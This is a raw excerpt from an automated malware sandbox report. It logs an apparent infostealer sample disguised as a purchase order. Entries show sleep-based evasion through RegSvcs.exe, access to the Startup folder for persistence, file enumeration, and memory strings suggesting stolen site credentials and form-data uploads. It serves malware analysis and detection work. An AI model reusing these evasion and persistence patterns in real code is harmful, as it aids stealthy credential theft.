                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594454Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594329Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594204Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594079Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593966Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599890Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599780Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599671Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599562Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599453Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599343Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599234Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599125Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599015Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598906Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598796Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598687Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598578Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598468Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598355Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598250Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598140Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598030Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597921Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597812Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597672Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597562Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597453Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597343Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597234Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597125Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597015Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596905Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596797Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596684Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596578Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596468Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596359Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596250Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596140Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596031Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595922Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595812Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595703Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595593Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595484Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595375Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595265Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595156Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595047Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594937Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594828Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594718Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594598Jump to behavior
                      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 1884Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 7940Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 2426Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 7432Jump to behavior
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-87516
                      Source: C:\Users\user\AppData\Local\directory\name.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeAPI coverage: 3.3 %
                      Source: C:\Users\user\AppData\Local\directory\name.exeAPI coverage: 3.4 %
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
                      Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 5_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,5_2_00452492
                      Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 5_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_00442886
                      Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 5_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,5_2_004788BD
                      Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 5_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,5_2_004339B6
                      Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 5_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,5_2_0045CAFA
                      Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 5_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_00431A86
                      Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 5_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,5_2_0044BD27
                      Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 5_2_0045DE8F FindFirstFileW,FindClose,5_2_0045DE8F
                      Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 5_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_0044BF8B
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599891Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599766Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599641Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599532Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599419Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599297Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599188Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599078Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598948Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598819Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598701Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598555Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598438Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598313Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598188Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598063Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597938Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597828Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597719Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597594Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597485Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597360Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597235Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597110Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596985Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596860Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596735Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596610Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596485Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596360Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596235Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596085Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595966Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595824Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595704Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595579Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595454Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595329Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595204Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595079Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594954Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594829Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594704Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594579Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594454Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594329Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594204Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594079Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593966Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599890Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599780Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599671Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599562Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599453Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599343Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599234Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599125Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599015Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598906Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598796Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598687Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598578Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598468Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598355Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598250Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598140Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598030Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597921Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597812Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597672Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597562Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597453Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597343Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597234Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597125Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597015Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596905Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596797Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596684Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596578Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596468Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596359Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596250Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596140Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596031Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595922Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595812Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595703Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595593Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595484Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595375Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595265Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595156Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595047Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594937Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594828Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594718Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594598Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
                      Source: RegSvcs.exe, 00000006.00000002.4540335552.0000000003AC5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                      Source: RegSvcs.exe, 00000003.00000002.4537810663.0000000002C77000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dce690e0867cd4
                      Source: RegSvcs.exe, 00000006.00000002.4538128302.00000000027D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dcd9daf8508ec0
                      Source: RegSvcs.exe, 00000006.00000002.4538128302.0000000002B66000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dcf87acb7f0612<
                      Source: RegSvcs.exe, 00000006.00000002.4540335552.0000000003AC5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                      Source: RegSvcs.exe, 00000003.00000002.4537810663.0000000002C77000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dcda0e47642328
                      Source: RegSvcs.exe, 00000003.00000002.4537810663.0000000002C77000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dcda2a11e28f03
                      Source: RegSvcs.exe, 00000006.00000002.4538128302.00000000027D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dce43bdbce8cfe
                      Source: RegSvcs.exe, 00000003.00000002.4537810663.0000000002C77000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dcd9f34a734345
                      Source: RegSvcs.exe, 00000006.00000002.4538128302.00000000027D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dce39b9b85919c
                      Source: RegSvcs.exe, 00000006.00000002.4540335552.0000000003AC5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                      Source: RegSvcs.exe, 00000006.00000002.4540335552.0000000003AC5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                      Source: RegSvcs.exe, 00000003.00000002.4537810663.0000000002D82000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dcef90c1a97496
                      Source: RegSvcs.exe, 00000006.00000002.4540335552.0000000003AC5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                      Source: RegSvcs.exe, 00000006.00000002.4538128302.0000000002AF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd02f8244d88eb<
                      Source: RegSvcs.exe, 00000006.00000002.4538128302.0000000002924000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dcf5262a282ce3
                      Source: RegSvcs.exe, 00000006.00000002.4540335552.00000000037A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                      Source: RegSvcs.exe, 00000006.00000002.4540335552.00000000037A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                      Source: RegSvcs.exe, 00000006.00000002.4538128302.0000000002D44000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dcf98f7b2e35ed<
